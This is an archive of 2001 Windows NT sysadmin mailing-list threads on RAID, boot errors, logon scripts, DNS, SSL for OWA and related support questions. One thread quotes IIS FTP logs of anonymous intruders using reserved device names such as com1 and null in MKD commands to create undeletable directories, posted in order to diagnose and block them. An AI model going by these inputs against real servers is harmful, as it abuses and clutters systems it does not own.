Wednesday, August 29, 2001 4:23 PM To: NT System Admin Issues Subject: RE: Hard drive configuration volume sets are notoriously bad - they have a way of crashing at bad times - I would personally do a raid array witha good hardware (Adaptec) raid controller. Jim Zangara, MCSE+I Special Projects Engineer Premiere Radio Networks A Division of Clear Channel Communications 15260 Ventura Blvd Suite 500 Sherman Oaks, CA 91403 Direct: (818) 461-8620 mailto:[EMAIL PROTECTED] In my house there's this light switch that doesn't do anything. Every so often I would flick it on and off just to check. Yesterday, I got a call from a woman in Germany. She said, Cut it out. -- Steven Wright -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Wednesday, August 29, 2001 4:19 PM To: NT System Admin Issues Subject: RE: Hard drive configuration Cool. So, I could create 3 of them as one volume so I don't have to give each drive a drive letter and then mirror that volume to the other three drives? -Original Message- From: Eric Wittenberg [mailto:[EMAIL PROTECTED]] Sent: Wednesday, August 29, 2001 4:06 PM To: NT System Admin Issues Subject: RE: Hard drive configuration Duplexing to NT is the same as mirroring. Windows does not care if they are on one controller (mirroring) or on two controllers (duplexing) Eric Wittenberg, MCSE CNA ASE Technical Systems Analyst 3D Computer Services Ltd. Edmonton, Alberta (780)484 9788 Fax (780) 484 9811 e-mail [EMAIL PROTECTED] URL www.3dcomp.com -Original Message- From
Re: Blue Screen STOP message C0000135 Appears at Startup
This is definitely looks like a job for the ERD commander from Winternals. I also read you can use the new Windows 2k Recovery Console feature on a crashed NT system if you boot from the Win 2K CD but I have not tried this personally. xylog - Original Message - From: Sean Martin [EMAIL PROTECTED] To: NT System Admin Issues [EMAIL PROTECTED] Sent: Thursday, August 30, 2001 7:13 PM Subject: Blue Screen STOP message C135 Appears at Startup This may be a shot in the dark. I'm experiencing the exact problem stated in article http://support.microsoft.com/support/kb/articles/Q173/3/09.ASP and I was wondering if any has, 1) had this same issue and, 2) knows a quicker way to resolve. The DLL referenced is in fact winsrv.dll The pc is a Compaq Deskpro EP, PII300 128mb RAM. NT Wrkstn 4 sp6a. Regards, Sean Martin, MCSE Network Administrator Ribelin Lowell Company Insurance Brokers, Inc. 3111 C Street, Suite 300 Anchorage, Alaska 99503 Ph: (907) 561-1250 Fax: (907) 561-4315 Cell: (907) 229-0885 Email: [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] DO NOT read, copy or disseminate this communication unless you are the intended addressee. This e-mail communication contains confidential and/or privileged information intended only for the addressee. If you have received this communication in error, please call us immediately at (907) 561-1250 and ask to speak to the sender of the communication. Also, please e-mail the sender and notify the sender immediately that you have received the communication in error. http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
Re: windows 2000 login script entry
Title: RE: windows 2000 login script entry More to the point after selecting mulitple users via control and shift keys User Manager allows you to alter certain properties for all selected users and one of these properties happens to be the logon script setting. xylog - Original Message - From: [EMAIL PROTECTED] To: NT System Admin Issues Sent: Thursday, August 30, 2001 4:49 PM Subject: RE: windows 2000 login script entry usermanager allows you to select everyone via the control key I think. -Original Message- From: Paul Green [mailto:[EMAIL PROTECTED]] Sent: Thursday, August 30, 2001 1:31 PM To: NT System Admin Issues Subject: windows 2000 login script entry Anyone know how to do a batch edit of all users? I need to change everyone's login script to login.bat. I have about 150 users to change. I'm using Windows 2000 Server with AD. Thanks, Paul _ Outgoing mail is certified Virus Free. Checked by AVG anti-virus system (www.grisoft.com). Version: 6.0.274 / Virus Database: 144 - Release Date: 8/23/2001 http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
Re: windows 2000 login script entry
Title: RE: windows 2000 login script entry OK I missed the win2k part, but you can still do it with the AD snap-in for users and computers, you just need to press alt-enter to get the properties window after doing the multiple select. xylog - Original Message - From: [EMAIL PROTECTED] To: NT System Admin Issues Sent: Thursday, August 30, 2001 5:35 PM Subject: RE: windows 2000 login script entry Now that I look at the subject again, I realize that my answer (albeit not as detailed as yours) works for NT. Guess it's the same for w2k too? -Original Message-From: xylog [mailto:[EMAIL PROTECTED]]Sent: Thursday, August 30, 2001 2:28 PMTo: NT System Admin IssuesSubject: Re: windows 2000 login script entry More to the point after selecting mulitple users via control and shift keys User Manager allows you to alter certain properties for all selected users and one of these properties happens to be the logon script setting. xylog - Original Message - From: [EMAIL PROTECTED] To: NT System Admin Issues Sent: Thursday, August 30, 2001 4:49 PM Subject: RE: windows 2000 login script entry usermanager allows you to select everyone via the control key I think. -Original Message- From: Paul Green [mailto:[EMAIL PROTECTED]] Sent: Thursday, August 30, 2001 1:31 PM To: NT System Admin Issues Subject: windows 2000 login script entry Anyone know how to do a batch edit of all users? I need to change everyone's login script to login.bat. I have about 150 users to change. I'm using Windows 2000 Server with AD. Thanks, Paul _ Outgoing mail is certified Virus Free. Checked by AVG anti-virus system (www.grisoft.com). Version: 6.0.274 / Virus Database: 144 - Release Date: 8/23/2001 http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
Re: Wildcard question
I have been incorperated since '97 and now work on a per contract basis. xylog - Original Message - From: Dewar Charles R [EMAIL PROTECTED] To: NT System Admin Issues [EMAIL PROTECTED] Sent: Wednesday, August 29, 2001 12:01 PM Subject: RE: Wildcard question I'm wondering. I've seen many resume's in IT like this with short stints at many companies. Is the job-hopping for higher salaries or are you doing contract work? Extremely impressive resume. -Original Message- From: Mark L. Kelsay [mailto:[EMAIL PROTECTED]] Sent: Monday, August 27, 2001 9:51 PM To: NT System Admin Issues Subject: RE: Wildcard question Very.. -Original Message- From: Puckett, Matt [mailto:[EMAIL PROTECTED]] Sent: Monday, August 27, 2001 5:44 PM To: NT System Admin Issues Subject: RE: Wildcard question IMPRESSIVE :-) Matthew Puckett MCSE, MCP+Internet, MCP Customer Support Analyst Genie KB for Customer Care Bristol Customer Care Center 1-540-642-3753 1-423-967-3086 - PCS We are the knights who say 'NI'. VIDEO callto:[EMAIL PROTECTED] CONFERENCE (Internal Use Only) -Original Message- From: xylog [mailto:[EMAIL PROTECTED]] Sent: Monday, August 27, 2001 5:37 PM To: NT System Admin Issues Subject: Re: Wildcard question If you are really interested: http://www.interrahost.com/resume.html http://www.interrahost.com/resume.html xylog - Original Message - From: Erik Sojka mailto:[EMAIL PROTECTED] To: NT System Admin Issues mailto:[EMAIL PROTECTED] Sent: Monday, August 27, 2001 4:18 PM Subject: RE: Wildcard question It makes it the sarcasm a little easier to take if we know with whom we're dealing. Where are my parting gifts? -Original Message- From: xylog [ mailto:[EMAIL PROTECTED] mailto:[EMAIL PROTECTED] ] Sent: Monday, August 27, 2001 3:56 PM To: NT System Admin Issues Subject: Re: Wildcard question Do you not like not knowing my name? xylog - Original Message - From: Lefkovics, William mailto:[EMAIL PROTECTED] To: NT System Admin Issues mailto:[EMAIL PROTECTED] Sent: Monday, August 27, 2001 3:32 PM Subject: RE: Wildcard question Do you not like your name? william -Original Message- From: xylog [ mailto:[EMAIL PROTECTED] mailto:[EMAIL PROTECTED] ] Sent: Monday, August 27, 2001 12:33 PM To: NT System Admin Issues Subject: Re: Wildcard question Sorry for the sarcasm, couldn't resist the low hanging fruit :-). No xylog is not my name just my MSN user ID. - Original Message - From: Blake R. mailto:[EMAIL PROTECTED] Fowkes To: NT System Admin mailto:[EMAIL PROTECTED] Issues Sent: Monday, August 27, 2001 3:09 PM Subject: RE: Wildcard question If you ever forget type set at the command prompt. SystemDrive=C: SystemRoot=C:\WINNT Thanks, Blake Fowkes Waid and Associates -Original Message- From: Lefkovics, William [ mailto:[EMAIL PROTECTED] mailto:[EMAIL PROTECTED] ] Sent: Monday, August 27, 2001 1:59 PM To: NT System Admin Issues Subject: RE: Wildcard question Correct. %systemdrive%\winnt\system32 is the same as %systemroot%\system32 If not, I'm sure xylog (is that your name?) will correct me. William -Original Message- From: xylog [ mailto:[EMAIL PROTECTED] mailto:[EMAIL PROTECTED] ] Sent: Monday, August 27, 2001 11:20 AM To: NT System Admin Issues Subject: Re: Wildcard question Nothing because that is an incorrect answer, should be %systemdrive%. We do have some wonderful parting gifts for the losers ... xylog - Original Message - From: Erik Sojka [EMAIL PROTECTED] To: NT System Admin Issues [EMAIL PROTECTED] Sent: Monday, August 27, 2001 2:14 PM Subject: RE: Wildcard question What do I win? -Original Message- From: David James [ mailto:[EMAIL PROTECTED] mailto:[EMAIL PROTECTED] ] Sent: Monday, August 27, 2001 2:19 PM To: NT System Admin Issues Subject: RE: Wildcard question Thanks. -Original Message- From: Erik Sojka [ mailto:[EMAIL PROTECTED] mailto:[EMAIL PROTECTED] ] Sent: Monday, August 27, 2001 1:10 PM To: NT System Admin Issues Subject: RE: Wildcard question %systemroot% -Original Message- From: David James [ mailto:[EMAIL PROTECTED] mailto:[EMAIL PROTECTED] ] Sent: Monday, August 27, 2001 2:15 PM To: NT System Admin Issues Subject: Wildcard question Hey, this is a buzzer beater question. I need a quick answer. What's the wildcard that goes into a login script for something like this: \\%localhost%\winnt\system32\etc file://\\%localhost%\winnt\system32\etc file://\\%localhost%\winnt\system32\etc I need the localhost part. I can't remember for the life of me right now David James http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com
Re: Domain Admin cannot use admin tools
Does this also happen with the domain administrator account? If not check that the global Domain Admins group is in the domain local administrators group. xylog - Original Message - From: Steve Kelsay [EMAIL PROTECTED] To: NT System Admin Issues [EMAIL PROTECTED] Sent: Tuesday, August 28, 2001 9:57 AM Subject: RE: Domain Admin cannot use admin tools Thanks agin. No, system error 5 (access denied) is returned. I'm stumped! [EMAIL PROTECTED] 08/28/01 09:41AM Can you add a dummy user from the command line using NET USER command? -Original Message- From: Steve Kelsay [mailto:[EMAIL PROTECTED]] Sent: Tuesday, 28 August 2001 14:40 To: NT System Admin Issues Subject: RE: Domain Admin cannot use admin tools Thanks for the reply. No, we have a single domain, no trusts. Netlogon is running fine. Nothing in the event logs pertinent to the problem. [EMAIL PROTECTED] 08/28/01 09:19AM trusts? have your account permissions been revoked in the trusted domain? contact those administrators and verify membership? i get the message but i am no longer an account op in the trusted domain... === Lerone Streeter System Analyst Abbott LBG [EMAIL PROTECTED] === -Original Message- From: Steve Kelsay [mailto:[EMAIL PROTECTED]] Sent: Tuesday, August 28, 2001 8:55 AM To: NT System Admin Issues Subject: Domain Admin cannot use admin tools Strange thing started happening last week. All the domain administrators have lost the capability of using usrmgr.exe and srvmgr.exe! They come up, but any attempt to make changes gets ACCESS DENIED. All accounts are still domain admins, and all rights remain unchanged. Checked for viruses and resynched, but no change. We are running Novell Account manager in parallel, but nothing has changed with it either, although I am most suspicious of this as the cause, but I need to cover all the bases. Has anyone seen this before? Steve Kelsay Network Administration Group South Carolina Department of Revenue 301 Gervais Street Columbia, SC 29201 (803) 898-5522 http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
Re: DNS Pointer Record
The zone file name is reverse order for example for subnet 192.168.0.x the zone name is 0.168.192.in-addr.arpa. The pointer records use normal IP addresses. xylog - Original Message - From: Alston, Steve [EMAIL PROTECTED] To: NT System Admin Issues [EMAIL PROTECTED] Sent: Monday, August 27, 2001 1:39 PM Subject: DNS Pointer Record I'm verifying DNS configuration on a NT 4.0 Server. Re the pointer record in the reverse Lookup file, should the IP address be in reverse order? I've read two sources -- one says forward, the other says reverse. Of course, the one that says reverse it is the Microsoft White Paper, so I'm inclined to believe that. Thanks, Steve Alston http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
Re: Wildcard question
Title: RE: Wildcard question Sorry for the sarcasm, couldn't resist the low hanging fruit :-). No xylog is not my name just my MSN user ID. - Original Message - From: Blake R. Fowkes To: NT System Admin Issues Sent: Monday, August 27, 2001 3:09 PM Subject: RE: Wildcard question If you ever forget type set at the command prompt. SystemDrive=C: SystemRoot=C:\WINNT Thanks, Blake Fowkes Waid and Associates -Original Message- From: Lefkovics, William [mailto:[EMAIL PROTECTED]] Sent: Monday, August 27, 2001 1:59 PM To: NT System Admin Issues Subject: RE: Wildcard question Correct. %systemdrive%\winnt\system32 is the same as %systemroot%\system32 If not, I'm sure xylog (is that your name?) will correct me. William -Original Message- From: xylog [mailto:[EMAIL PROTECTED]] Sent: Monday, August 27, 2001 11:20 AM To: NT System Admin Issues Subject: Re: Wildcard question Nothing because that is an incorrect answer, should be %systemdrive%. We do have some wonderful parting gifts for the losers ... xylog - Original Message - From: "Erik Sojka" [EMAIL PROTECTED] To: "NT System Admin Issues" [EMAIL PROTECTED] Sent: Monday, August 27, 2001 2:14 PM Subject: RE: Wildcard question What do I win? -Original Message- From: David James [mailto:[EMAIL PROTECTED]] Sent: Monday, August 27, 2001 2:19 PM To: NT System Admin Issues Subject: RE: Wildcard question Thanks. -Original Message- From: Erik Sojka [mailto:[EMAIL PROTECTED]] Sent: Monday, August 27, 2001 1:10 PM To: NT System Admin Issues Subject: RE: Wildcard question %systemroot% -Original Message-From: David James [mailto:[EMAIL PROTECTED]] Sent: Monday, August 27, 2001 2:15 PM To: NT System Admin IssuesSubject: Wildcard question Hey, this is a buzzer beater question. I need a quick answer. What's the wildcard that goes into a login script for something like this: \\%localhost%\winnt\system32\etc file://\\%localhost%\winnt\system32\etc I need the localhost part. I can't remember for the life of me right now David James http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
Re: Wildcard question
Title: RE: Wildcard question
Do you not like not knowing my name?
xylog
- Original Message -
From:
Lefkovics, William
To: NT System Admin Issues
Sent: Monday, August 27, 2001 3:32
PM
Subject: RE: Wildcard question
Do
you not like your name?
william
-Original Message-From: xylog [mailto:[EMAIL PROTECTED]]Sent: Monday,
August 27, 2001 12:33 PMTo: NT System Admin
IssuesSubject: Re: Wildcard question
Sorry for the sarcasm, couldn't resist the low
hanging fruit :-).
No xylog is not my name just my MSN user ID.
- Original Message -
From:
Blake R. Fowkes
To: NT System Admin Issues
Sent: Monday, August 27, 2001 3:09
PM
Subject: RE: Wildcard question
If you ever forget type set at the command prompt.
SystemDrive=C: SystemRoot=C:\WINNT
Thanks, Blake Fowkes
Waid and Associates
-Original Message- From:
Lefkovics, William [mailto:[EMAIL PROTECTED]]
Sent: Monday, August 27, 2001 1:59 PM To: NT System Admin Issues Subject: RE:
Wildcard question
Correct.
%systemdrive%\winnt\system32 is the same as
%systemroot%\system32
If not, I'm sure xylog (is that your name?) will correct
me.
William
-Original Message- From:
xylog [mailto:[EMAIL PROTECTED]]
Sent: Monday, August 27, 2001 11:20 AM To: NT System Admin Issues Subject: Re:
Wildcard question
Nothing because that is an incorrect answer, should be
%systemdrive%. We do have some wonderful parting
gifts for the losers ...
xylog - Original Message
- From: "Erik Sojka"
[EMAIL PROTECTED] To: "NT System Admin Issues"
[EMAIL PROTECTED] Sent:
Monday, August 27, 2001 2:14 PM Subject: RE:
Wildcard question
What do I win?
-Original Message- From: David James [mailto:[EMAIL PROTECTED]]
Sent: Monday, August 27, 2001 2:19 PM
To: NT System Admin Issues Subject: RE: Wildcard question
Thanks.
-Original Message-
From: Erik Sojka [mailto:[EMAIL PROTECTED]] Sent: Monday, August 27, 2001 1:10 PM To: NT System Admin Issues
Subject: RE: Wildcard question
%systemroot%
-Original Message-From:
David James [mailto:[EMAIL PROTECTED]]
Sent: Monday, August 27, 2001 2:15 PM
To: NT System Admin IssuesSubject: Wildcard question
Hey, this is a buzzer beater question.
I need a quick answer. What's
the wildcard that goes into a login script
for something like this:
\\%localhost%\winnt\system32\etc file://\\%localhost%\winnt\system32\etc
I need the
localhost part. I can't remember for the life of me right
now
David James
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
http://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htm
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
Re: Wildcard question
Title: Message
If you are really interested:
http://www.interrahost.com/resume.html
xylog
- Original Message -
From:
Erik Sojka
To: NT System Admin Issues
Sent: Monday, August 27, 2001 4:18
PM
Subject: RE: Wildcard question
It
makes it the sarcasm a little easier to take if we know with whom we're
dealing. Where are my parting gifts?
-Original Message-From: xylog [mailto:[EMAIL PROTECTED]] Sent:
Monday, August 27, 2001 3:56 PMTo: NT System Admin
IssuesSubject: Re: Wildcard question
Do you not like not knowing my
name?
xylog
- Original Message -
From:
Lefkovics, William
To: NT System Admin Issues
Sent: Monday, August 27, 2001 3:32
PM
Subject: RE: Wildcard question
Do you not like your name?
william
-Original Message-From: xylog [mailto:[EMAIL PROTECTED]]Sent:
Monday, August 27, 2001 12:33 PMTo: NT System Admin
IssuesSubject: Re: Wildcard question
Sorry for the sarcasm, couldn't resist the
low hanging fruit :-).
No xylog is not my name just my MSN user ID.
- Original Message -
From:
Blake R.
Fowkes
To: NT System Admin Issues
Sent: Monday, August 27, 2001 3:09
PM
Subject: RE: Wildcard
question
If you ever forget type set at the command
prompt.
SystemDrive=C: SystemRoot=C:\WINNT
Thanks, Blake Fowkes
Waid and Associates
-Original Message- From:
Lefkovics, William [mailto:[EMAIL PROTECTED]]
Sent: Monday, August 27, 2001 1:59 PM To: NT System Admin Issues Subject: RE:
Wildcard question
Correct.
%systemdrive%\winnt\system32 is the same as
%systemroot%\system32
If not, I'm sure xylog (is that your name?) will correct
me.
William
-Original Message- From:
xylog [mailto:[EMAIL PROTECTED]]
Sent: Monday, August 27, 2001 11:20 AM To: NT System Admin Issues Subject: Re:
Wildcard question
Nothing because that is an incorrect answer, should be
%systemdrive%. We do have some wonderful parting
gifts for the losers ...
xylog - Original Message
- From: "Erik Sojka"
[EMAIL PROTECTED] To: "NT System Admin
Issues" [EMAIL PROTECTED] Sent: Monday, August 27, 2001 2:14 PM Subject: RE: Wildcard question
What do I win?
-Original Message- From: David James [mailto:[EMAIL PROTECTED]]
Sent: Monday, August 27, 2001 2:19 PM
To: NT System Admin Issues Subject: RE: Wildcard question Thanks.
-Original Message- From: Erik
Sojka [mailto:[EMAIL PROTECTED]]
Sent: Monday, August 27, 2001 1:10 PM
To: NT System Admin Issues Subject: RE: Wildcard question %systemroot%
-Original Message-
From: David James [mailto:[EMAIL PROTECTED]]
Sent: Monday, August 27, 2001 2:15
PMTo: NT System Admin
IssuesSubject: Wildcard
question Hey, this
is a buzzer beater question. I need a quick answer. What's
the wildcard that goes into a login script for something like
this: \\%localhost%\winnt\system32\etc file://\\%localhost%\winnt\system32\etc
I need the
localhost part. I can't remember for the life of me right
now
David Jameshttp://www.sunbelt-software.com/ntsysadmin_list_charter.htm
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
http://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htm
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
Re: Netbios name resolves to domain name
Title: Message Do you have reverse DNS zones setup? What this looks like is the following: DNS/Wins is resoving the servername to an IP address then the ping command is doing a reverse DNS lookup and finding the FQHN and displaying that. xylog - Original Message - From: Niki Blowfield To: NT System Admin Issues Sent: Friday, August 24, 2001 8:56 AM Subject: Netbios name resolves to domain name Hi We have an NT4 Domain, with one Exchange 5.5 server on the PDC. I have attempted to install another Exchange server into the site, but the installation fails at the end, with an error asking me to check if the directory service is started. The service is started, so upon investigation of technet, it mentions name resolution on the two servers. I have checked, and when I ping the server name of the server I'm trying to install, it resolves it to a domain name. e.g.; ping NEWEXCHSERVER pinging NEWEXCHSERVER.CO.UK [201.167.xxx.xxx] etc etc Whereas, if I pingthe other way, it works okay. e.g. ping EXISTINGEXCSERVER pinging EXISTINGEXCSERVER [192.168.2.25] etc I have entered the new server into the lmhosts file of the exchange server and rebooted, but no difference. could this be the problem? if so, any ideas on a resolution Nikhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
Re: IIS and OWA
You need to get a Secure Server Certificate. You can purchase one from Verisign or if you have Win2K Server you can install MS Certificate Server and generate your own cert. In order to do this you need to generate a Certificate Server Request or CSR from the IIS management console under the directory security tab, submit it and install the resultant certificatee. Problem with generating your own certificate is that you will need to install the Trusted Root Authority in your client browsers in order for it to work properly. xylog - Original Message - From: Troy Rambo /278 Systems Specialist [EMAIL PROTECTED] To: NT System Admin Issues [EMAIL PROTECTED] Sent: Wednesday, August 22, 2001 10:47 AM Subject: RE: IIS and OWA no we won't because this will only be used by a few of our outside sales reps and the CEO and CFO. Maximim number of users will be about 20 and never at the same time. We're a small company, we don't need this set up on a server. Besides, the guys on this list convinced me to use Pro because of the small number of users needing this. (Which I agree with.) I want to use SSL, but I can't find any white papers that show me how. They all reference it, but none of them describes the actual steps for setting it up. -Original Message- From: Joe Casale [mailto:[EMAIL PROTECTED]] Sent: Wednesday, August 22, 2001 9:40 AM To: NT System Admin Issues Subject: RE: IIS and OWA Use SSL w/ OWA if you need lotsa sec, but one Q guys, isn't the max connection for pro in the lic agreement limited to 10 concurrent connections? If so, you will most likely violate that by using this box? Goto www.microsoft.com/security and tool around from there. Jlc Ps. Why Pro? -Original Message- From: Troy Rambo /278 Systems Specialist [mailto:[EMAIL PROTECTED]] Sent: Wednesday, August 22, 2001 8:37 AM To: NT System Admin Issues Subject: IIS and OWA Well, I've got IIS5 and OWA istalled on a 2000 Professional Workstation and it's working internally so far. What I need to know how to do is get this thing locked down as tightly as possible so that when I put it in our DMZ on the firewall, it doesn't get hacked. Are there any good white papers or websites for understanding OWA and IIS 5? I've done some searching, but everything I've found talks about what to do, but it doesn't show you how to do it. Good suggestions are also welcome. Thanks in advance. Troy Rambo Systems Specialist CERAC Inc. 414-212-0278 http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
Re: Access to Terminal Server
Can you be a little more vague? xylog - Original Message - From: Terry [EMAIL PROTECTED] To: NT System Admin Issues [EMAIL PROTECTED] Sent: Friday, August 17, 2001 11:16 AM Subject: Access to Terminal Server I am not at a location now that permits me to look back into the past posts, so I am sorry if this has come up recently. I need to be able to give access to a server through Terminal Services, WITHOUT giving administrator rights to that account. Anyone done this? TIA Terry Caleb http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
Re: STRANGE undeletable directory
Title: Message
Just FYI these log entries are from a Windows 2KS
running IIS 5.0
xylog
- Original Message -
From:
Bunting,
Jeff
To: NT System Admin Issues
Sent: Thursday, August 16, 2001 4:34
PM
Subject: RE: STRANGE undeletable
directory
This
is what I was talking about earlier when it was suggested the server was
hacked because of the funny directory names. I was speculating there
might be a way to create those directories with the normal permissions given
to the anonymous account in a write enabled directory. The original post
about the server with the "aux" directory could very well have been hacked, I
just wasn't sure if the presence of those directories in a public FTP folder
was enough evidence to jump to that conclusion without looking at the
logs.
I
did some experimenting and found I can't create the
"com1.scanned.by.zog+++/+++/" directory under IIS5. Perhaps it can be
done in IIS4? I'm running Serv-U FTP on all of the IIS4 machines so I
can't test it there. The "+++COM2" and "null.upload" are legal though
and can be deleted by normal means.
On a
related note, I've been getting some of the same people connecting to my
server, some warez guys from France. I was watching their activity
closely for awhile because they don't have download permissions from the
uploads directory yet they continued to upload files which didn't make a lot
of sense to me. I saw attempts at downloading, but nothing to indicate
they were successful or coming in by other means, so I've just started banning
their ip ranges because I'm tired of cleaning up all of the garbage on the ftp
site.
Jeff
-Original Message-From: xylog
[mailto:[EMAIL PROTECTED]]Sent: Thursday, August 16, 2001 3:08
PMTo: NT System Admin IssuesSubject: Fw: STRANGE
undeletable directory
OK here is one with the "undeletable"
directory. The last one was just plain dirs:
#Fields: time c-ip cs-method cs-uri-stem
sc-status 07:53:08 217.128.73.112 [10]USER anonymous 33107:53:08
217.128.73.112 [10]PASS [EMAIL PROTECTED]
23007:53:32 217.128.73.112 [11]USER anonymous 33107:53:32
217.128.73.112 [11]PASS [EMAIL PROTECTED] 23007:54:29
217.128.73.112 [11]MKD Tagged+By+Gru+++/+++/ 25707:54:42 217.128.73.112
[11]MKD Tagged+By+Gru+++/+++Board/ 25707:55:14 217.128.73.112 [11]MKD
com1.scanned.by.zog+++/+++/
257
NOTICE com107:55:31 217.128.73.112 [11]MKD
com1.scanned.by.zog+++/+++COM2/
257COM207:55:54
217.128.73.112 [11]MKD null.upload.by.derfy+++/+++/ 257
dont know what this null thingy is07:56:11
217.128.73.112 [11]MKD null.upload.by.derfy+++/+++COM1/ 25707:56:29
217.128.73.112 [11]MKD 07.27.01Reel_Fishing_Wild_DC-ECHELON 257
xylog
- Original Message -
From:
xylog
To: NT System Admin Issues
Sent: Thursday, August 16, 2001 2:58
PM
Subject: Re: STRANGE undeletable
directory
I had some bozo do this ^#@ to one of my
boxes, here is the log entires:
12:35:46 193.253.37.219 [4]USER anonymous
33112:35:46 193.253.37.219 [4]PASS [EMAIL PROTECTED] 23012:35:50
193.253.37.219 [4]MKD 010626143627p 25712:35:50 193.253.37.219 [4]RMD
010626143627p 25020:47:30 193.253.37.219 [5]USER anonymous
33120:47:30 193.253.37.219 [5]PASS [EMAIL PROTECTED]
23020:47:57 193.253.37.219 [5]MKD /.tmp 25720:47:59 193.253.37.219
[5]MKD /.tmp/Tag++Scan 25720:48:02 193.253.37.219 [5]MKD
/.tmp/Tag++Scan/Genetic+SPECIE 25720:48:04 193.253.37.219 [5]MKD
/.tmp/Tag++Scan/Genetic+SPECIE/for+DZ 25720:48:23 193.253.37.219
[5]QUIT - 257
You set the log settings from the IIS
management console snap-in in the FTP site properties page.
xylog
- Original Message -
From:
Bunting, Jeff
To: NT System Admin Issues
Sent: Thursday, August 16, 2001
1:19 PM
Subject: RE: STRANGE undeletable
directory
What options need to be ticked to record the
FTP commands in IIS? The settings show the same categories as the
WWW logs which don't intuitively apply to FTP.
The deaults options just show the name of the
file created.
-Original Message-From: xylog [mailto:[EMAIL PROTECTED]]Sent:
Thursday, August 16, 2001 1:10 PMTo: NT System Admin
IssuesSubject: Re: STRANGE undeletable
directory
Look in your FTP logs you will see
exactly the command used to create those dirs.
xylog
- Original Message -
From:
Bunting, Jeff
Re: ext2 fs reader from dos
I dont know of that but any such program but a Linux boot disk can mount both ext2 as well as Fat partitions enabling you to transfer data to a DOS readable partition if that is your goal there is one for my Tivo that I use that you can download here: http://pvrhack.sonnik.com/tivo/downloads/tivoboot_v3.zip [EMAIL PROTECTED] - Original Message - From: Joe Casale To: NT System Admin Issues Sent: Tuesday, August 14, 2001 10:43 PM Subject: ext2 fs reader from dos Is there an ntfsdos equiv for ext2 filesystems? Thanks! jlchttp://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
